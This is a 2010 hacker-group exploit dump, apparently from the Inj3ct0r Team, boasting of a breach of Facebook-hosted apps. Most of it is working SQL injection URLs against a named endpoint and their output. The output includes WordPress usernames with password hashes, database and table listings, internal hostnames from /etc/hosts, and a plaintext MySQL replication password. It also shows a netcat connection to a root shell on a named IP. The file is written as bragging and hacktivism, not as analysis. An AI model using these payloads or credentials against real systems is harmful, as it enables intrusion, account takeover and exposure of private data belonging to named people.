facebookpa-sql.txt
Posted on 20 July 2010
==================================================== FaceBook's servers was hacked again by Inj3ct0r Team ==================================================== Part 1 Original: http://inj3ct0r.com/exploits/11638 Part 2 Original: http://inj3ct0r.com/exploits/13403 [+] English translation Inj3ct0r official website => Inj3ct0r.com Inj3ct0r community => 0xr00t.com __ __ ___ __ __ /'__` / \__ /'__`\n/\_ ___ /\_/\_L ___ ,_/ / _ __ ___ ___ ___ ___ / /' _ ` / /_/_\_<_ /'___ / /`'__ /'___ / __` /' __` __`\n / / / L / \__/ \_ \_ / __/ \__// L / / / \n \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ /\_ \____ \____/ \_ \_ \_\n/_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /_//____//___/ /_//_//_/ \____/ /___/ [0x00] [Introduction] [0x01] [Search for bugs / crash] [0x02] [0wner] [0x03] [Conclusion] [0x04] [Greetz] __ __ __ /'__` /'__` /'__`\n/ / __ _/ / / / \n / /' \n \_ /> </ \_ \_ \n \____//\_/\_\ \____/ \____/ /___/ ///_/ /___/ /___/ [Introduction] In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo __ __ _ /'__` /'__` /' \n/ / __ _/ / /\_, \n / /' /_/ \n \_ /> </ \_ \n \____//\_/\_\ \____/ \_\n/___/ ///_/ /___/ /_/ [Search for bugs / crash] inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com ...Search Vulnerabilities . . . . . . . . . .. . . .. . . . .. [+] found 13 vulns and 6 warning [+] open 31337 port yes [+] connect... Brevity the soul of wit.. inj3ct0r.com@mybox [~] inj3ct0r.com@host [~]# cd /home inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com ...attack starting . . . . . . . . . .. . . .. . . . .. __ __ ___ /'__` /'__` /'___`\n/ / __ _/ / /\_ / \n / /' /_/// /__ \_ /> </ \_ // /_ \n \____//\_/\_\ \____//\______/ /___/ ///_/ /___/ /_____/ [0wner] Successful Shell on 31337 port . . . . . inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337 ............................................................... apps.facebook@host [~]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -[0x33]- Proofs ############ # REQUESTS # ############ ;===== BASIC INFO http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 ;===== LIST TABLES http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1 ;===== LIST COLUMNS http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1 ;===== LIST WORDPRESS USERS/PASS http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1 admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/ lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK. tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/ ----- http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1 admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b. test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk ----- http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users-- admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/ lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz ################ # INFORMATIONS # ################ ;===== PATH /home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php ;===== BASIC INFO tomkincaid@ps5008.dreamhost.com politicsapp 5.0.45-log ;===== TABLES # astro ** app ** oscache ** user # candukincaid ** wp_commentmeta ** wp_comments ** wp_links ** wp_options ** wp_postmeta ** wp_posts ** wp_px_albumPhotos ** wp_px_albums ** wp_px_galleries ** wp_px_photos ** wp_px_plugins ** wp_term_relationships ** wp_term_taxonomy ** wp_terms ** wp_usermeta ** wp_users # cemeteries ** AmazonItem ** AmazonType ** CameraType ** Format ** Guestbook ** Links ** Photo ** Scan # churchwpdb ** wp_comments ** eventscalendar_main ** icl_languages ** icl_languages_translations ** icl_locale_map ** icl_translations ** links ** options ** postmeta ** posts ** term_relationships ** term_taxonomy ** terms ** usermeta ** users # countdownapp ** oscache ** user # crush ** couple ** oscache ** user # dare ** flag ** game ** item ** user # friendiq ** oscache ** score ** user # giants ** app ** league ** media ** mediaforuser ** oscache ** post ** team ** topic ** user # hookup ** couple ** neverblue ** oscache ** user # jauntlet ** user # loccus ** checkin ** oscache ** user # luciacanduwp ** wp_comments ** wp_links ** wp_options ** wp_postmeta ** wp_posts ** wp_term_relationships ** wp_term_taxonomy ** wp_terms ** wp_usermeta ** wp_users # maps ** place ** user # martisor ** user # mediax ** oscache ** user # mostlikely ** callback ** statement ** statementforuser ** user # music ** itemforuser ** oscache ** user # pimpfriends ** activity ** ad ** favorite ** gift ** giftforho ** hoforpimp ** johnforho ** oscache ** permission ** photoforuser ** room ** user ** wall ** whistle # plans ** attend ** cache ** event ** place ** user # politicsapp ** app ** badge ** badgeforuser ** issue ** oscache ** position ** positionforuser ** post ** user # postergifts ** category ** categoryproduct ** categoryrelationship ** image ** oscache ** posterforuser ** user # posters2 ** category ** categoryproduct ** categoryrelationship ** image ** oscache ** posterforuser ** user # projectbasecamp ** clicktimeproject ** clicktimereport ** clicktimetask ** idcorrelation ** projectbudget ** taskforuser ** user # pwnfriends ** photo ** photoforfriend ** photoforuser ** user # quiz ** app ** question ** quiz ** result ** resultforquestion ** resultforuser ** user # seeall ** network ** networkforuser ** test2 ** userpref # send ** app ** item ** itemforuser ** neverblue ** user # supporter ** oscache ** user # swapu ** item ** itemforuser ** network ** networkforuser ** swaptype ** user # tomsapps ** ad ** adclick ** app ** contest ** notification # travelbug ** bug ** bugcache ** user # tv ** app ** oscache ** post ** series ** seriesforuser ** thread ** threadforuser ** user # wikitravel ** badmap ** wikitravelimage ** wikitravelpage --------------------------------------------------------------------------------------------------------------------------------------------------- read /etc/hosts 127.0.0.1 localhost localhost.localdomain 192.168.1.167 140696-db2.flufffriends.com 140696-db2 192.168.1.166 140695-db1.flufffriends.com 140695-db1 192.168.1.165 140694-web2.flufffriends.com 140694-web2 192.168.1.164 140693-web1.flufffriends.com 140693-web1 69.63.176.141 api.facebook.com 208.116.17.80 peanutlabs.com ---------------------------------- /etc/my.cnf #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1 log-bin=/var/lib/mysqllogs/bin-log binlog-do-db=fluff2 expire-logs-days=14 server-id = 2 #master-host=69.63.180.15 #master-user=tomkincaid_user #master-password=tomkincaid123 #master-connect-retry=50 replicate-do-db=miserman #log-slave-updates expire_logs_days = 14 goOd =] Nice Hacking old school xD __ __ __ /'__` /'__` /'__`\n/ / __ _/ / /\_L \n / /' /_/_\_<_ \_ /> </ \_ / L \n \____//\_/\_\ \____/ \____/ /___/ ///_/ /___/ /___/ [Conclusion] There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database) __ __ __ __ /'__` /'__`/ \ \n/ / __ _/ / \ \n / /' \ \_ \_ /> </ \_ \__ ,__\n \____//\_/\_\ \____//_/\_\_/ /___/ ///_/ /___/ /_/ [Greetz] Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members! 31337 Inj3ct0r Members: cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka, Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc.. ---------------------------------------------------------------------------------------------- Personally h4x0rz: Sir Zaid (none) Dante90 http://inj3ct0r.com/author/916 SONiC http://inj3ct0r.com/author/2545 **RoAd_KiLlEr** http://inj3ct0r.com/author/2447 MasterGipy http://inj3ct0r.com/author/2346 You are good hackers. Respect y0u! Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team! Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =] At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip We want to thank the following people for their contribution. Do not forget to keep track of vulnerabilities in Inj3ct0r.com H.A.C.K.T.I.V.I.S.M. WIN! =]
